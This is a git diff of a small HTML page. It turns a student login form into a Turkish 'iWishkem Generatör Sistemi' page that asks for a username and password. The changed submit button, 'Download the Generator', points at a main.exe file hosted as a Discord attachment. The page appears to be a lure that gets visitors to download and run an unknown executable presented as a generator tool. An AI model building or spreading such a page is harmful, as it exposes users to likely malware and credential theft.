--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html> 
 <head>
 <meta name="viewport" content="width=device-width, initial-scale=1">
-<title> Login Page </title>
+<title> iWishkemm </title>
 <style> 
 Body {
   font-family: Calibri, Helvetica, sans-serif;
@@ -45,16 +45,16 @@ button {
 </style> 
 </head>  
 <body>  
-    <center> <h1> Student Login Form </h1> </center> 
+    <center> <h1> iWishkem Generatör Sistemi </h1> </center> 
     <form>
         <div class="container"> 
-            <label>Username : </label> 
-            <input type="text" placeholder="Enter Username" name="username" required>
-            <label>Password : </label> 
-            <input type="password" placeholder="Enter Password" name="password" required>
-            <button type="submit" formaction="https://www.w3docs.com">Giriş Yap</button> 
-            <input type="checkbox" checked="checked"> Remember me 
-            <button type="button" class="cancelbtn"> Cancel</button> 
+            <label>Verilen Kullanıcı Adı : </label> 
+            <input type="text" placeholder="Kullanıcı Adını Gir" name="username" required>
+            <label>Verilen Şifre : </label> 
+            <input type="password" placeholder="Şifreni Gir" name="password" required>
+            <button type="submit" formaction="https://cdn.discordapp.com/attachments/931941841237065778/980411977950199818/main.exe">Generatörü İndir</button> 
+            <input type="checkbox" checked="checked"> Beni Hatırla 
+            <button type="button" class="cancelbtn"> Vazgeç</button> 
             Forgot <a href="#"> password? </a> 
         </div> 
     </form>   
